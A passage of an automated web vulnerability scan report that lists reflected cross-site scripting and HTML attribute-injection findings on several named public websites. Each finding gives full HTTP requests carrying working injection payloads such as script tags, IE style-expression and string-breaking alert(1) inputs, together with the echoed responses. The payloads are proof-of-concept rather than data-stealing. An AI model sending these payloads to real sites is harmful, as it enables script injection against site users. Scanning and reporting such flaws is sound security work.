Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

{"l":"peYfab2EsTTWwlqkVMgA4Q==","r":"rcxKUs77Dw02ESv5cb+e+w==","rr":"IF8Yy95dSt9Ecb50XY6Mog==","c":"Locale=en-US","su":""}

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117439
Date: Tue, 19 Jul 2011 16:02:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:40 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/Recommendations.axd32a35' a=b af794d36cbc' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.137. http://www.gamestop.com/ScriptResource.axd [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /ScriptResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb13a'%20a%3db%208855338f870 was submitted in the REST URL parameter 1. This input was echoed as eb13a' a=b 8855338f870 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ScriptResource.axdeb13a'%20a%3db%208855338f870?d=JUWzwDM6J1O9dvzPL3WifBcDrceKUILBVALOotNA8ZNC3NRB-tqVx2rqwB4j25dIdNmSckr1NnDdVSb8someErW3DymlJx0hNOZI23Og7ARy99QWf-Fc0jT2IBslLCo2KmsaCC6X_4v932KibHmTRWWUGBk1&t=ffffffff8457574f HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 118139
Date: Tue, 19 Jul 2011 16:02:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:29 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/ScriptResource.axdeb13a' a=b 8855338f870?d=JUWzwDM6J1O9dvzPL3WifBcDrceKUILBVALOotNA8ZNC3NRB-tqVx2rqwB4j25dIdNmSckr1NnDdVSb8someErW3DymlJx0hNOZI23Og7ARy99QWf-Fc0jT2IBslLCo2KmsaCC6X_4v932KibHmTRWWUGBk1%26t=ffffffff8457574f' id='header_auth_act
...[SNIP]...

4.138. http://www.gamestop.com/WebResource.axd [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /WebResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d6bec'%20a%3db%2082afe38e9ca was submitted in the REST URL parameter 1. This input was echoed as d6bec' a=b 82afe38e9ca in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /WebResource.axdd6bec'%20a%3db%2082afe38e9ca?d=m1DsqMTwlT-RGKCtGfxYBloVHh8h1knnFeXre9UxNqlvQUJW8dGTdDWRsiHUrmCXBrjrQGgZOAdWXPjXXqW6hMxBZ5dbvnDeZYCfMfzz3iK7REQi4IgFM-qEapKq_OJ4cGSjRI07slCVxwBCJybWFmGxp6tqRzha4upPnJ4xzb8zhk060&t=634465910017528089 HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117835
Date: Tue, 19 Jul 2011 16:02:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:28 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/WebResource.axdd6bec' a=b 82afe38e9ca?d=m1DsqMTwlT-RGKCtGfxYBloVHh8h1knnFeXre9UxNqlvQUJW8dGTdDWRsiHUrmCXBrjrQGgZOAdWXPjXXqW6hMxBZ5dbvnDeZYCfMfzz3iK7REQi4IgFM-qEapKq_OJ4cGSjRI07slCVxwBCJybWFmGxp6tqRzha4upPnJ4xzb8zhk060%26t=6344659100175280
...[SNIP]...

4.139. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /common/gui/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2cca'%20a%3db%20760b5dafaf4 was submitted in the REST URL parameter 1. This input was echoed as c2cca' a=b 760b5dafaf4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commonc2cca'%20a%3db%20760b5dafaf4/gui/favicon.ico HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=783322707284241; RES_SESSIONID=463845686754211; ResonanceSegment=1; rsi_segs=D08734_70056|D08734_70065|10165; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B%20s_ppv%3D26%252C26%252C723%3B

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Content-Type: text/html; charset=utf-8
Content-Length: 117789
Cache-Control: private, max-age=86400
Date: Tue, 19 Jul 2011 16:02:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/commonc2cca' a=b 760b5dafaf4/gui/favicon.ico' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.140. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /common/gui/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89455'style%3d'x%3aexpression(alert(1))'346df7674c3 was submitted in the REST URL parameter 2. This input was echoed as 89455'style='x:expression(alert(1))'346df7674c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /common/gui89455'style%3d'x%3aexpression(alert(1))'346df7674c3/favicon.ico HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=783322707284241; RES_SESSIONID=463845686754211; ResonanceSegment=1; rsi_segs=D08734_70056|D08734_70065|10165; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B%20s_ppv%3D26%252C26%252C723%3B

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Content-Type: text/html; charset=utf-8
Content-Length: 117835
Cache-Control: private, max-age=86394
Date: Tue, 19 Jul 2011 16:02:44 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/common/gui89455'style='x:expression(alert(1))'346df7674c3/favicon.ico' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.141. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /common/gui/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 38729'style%3d'x%3aexpression(alert(1))'5d861ec7448 was submitted in the REST URL parameter 3. This input was echoed as 38729'style='x:expression(alert(1))'5d861ec7448 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /common/gui/favicon.ico38729'style%3d'x%3aexpression(alert(1))'5d861ec7448 HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=783322707284241; RES_SESSIONID=463845686754211; ResonanceSegment=1; rsi_segs=D08734_70056|D08734_70065|10165; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B%20s_ppv%3D26%252C26%252C723%3B

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117491
Date: Tue, 19 Jul 2011 16:02:46 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:47 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/common/gui/favicon.ico38729'style='x:expression(alert(1))'5d861ec7448' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.142. http://www.netlogiq.ro/Portofoliu-Web-Design.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlogiq.ro
Path:   /Portofoliu-Web-Design.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac71"><script>alert(1)</script>251e3ca71be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Portofoliu-Web-Design.html?6ac71"><script>alert(1)</script>251e3ca71be=1 HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245; sifrFetch=true; __utma=147345704.25025431.1311097255.1311097255.1311097255.1; __utmb=147345704.1.10.1311097255; __utmc=147345704; __utmz=147345704.1311097255.1.1.utmcsr=umfcluj.ro|utmccn=(referral)|utmcmd=referral|utmcct=/search.aspx

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:44:45 GMT
Content-Length: 224574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<a href="/Portofoliu-Web-Design?6ac71"><script>alert(1)</script>251e3ca71be=1--cID105--y0--m0--pag1.html ">
...[SNIP]...

4.143. http://www.stumbleupon.com/submit [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e4de"style%3d"x%3aexpression(alert(1))"0d3e962a0e4 was submitted in the url parameter. This input was echoed as 4e4de"style="x:expression(alert(1))"0d3e962a0e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity4e4de"style%3d"x%3aexpression(alert(1))"0d3e962a0e4&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da; cmf_i=309046094e1443cb1cc136.64488011; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 48738
Date: Tue, 19 Jul 2011 14:29:12 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<input type="hidden" name="url" value="http://www.factset.com/products/privateequity4e4de"style="x:expression(alert(1))"0d3e962a0e4" />
...[SNIP]...

4.144. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_bus

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3771'%3balert(1)//8c917a196fd was submitted in the cli cookie. This input was echoed as c3771';alert(1)//8c917a196fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_bus;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83cc3771'%3balert(1)//8c917a196fd; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:32 GMT
Content-Length: 7241
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10100252408_1311108272","http://ad.doubleclick.net/adj/q1.q.boston/be_bus;net=q1;u=,q1-10100252408_1311108272,11fda490648f83cc3771';alert(1)//8c917a196fd,jobs,;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=;ord=1807584008?","160","600",false);</scr'+'ipt>
...[SNIP]...

4.145. http://a.collective-media.net/cmadj/q1.q.boston/be_home [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_home

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7628e'%3balert(1)//4dbde60b8a6 was submitted in the cli cookie. This input was echoed as 7628e';alert(1)//4dbde60b8a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_home;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c7628e'%3balert(1)//4dbde60b8a6; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:38 GMT
Content-Length: 7652
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
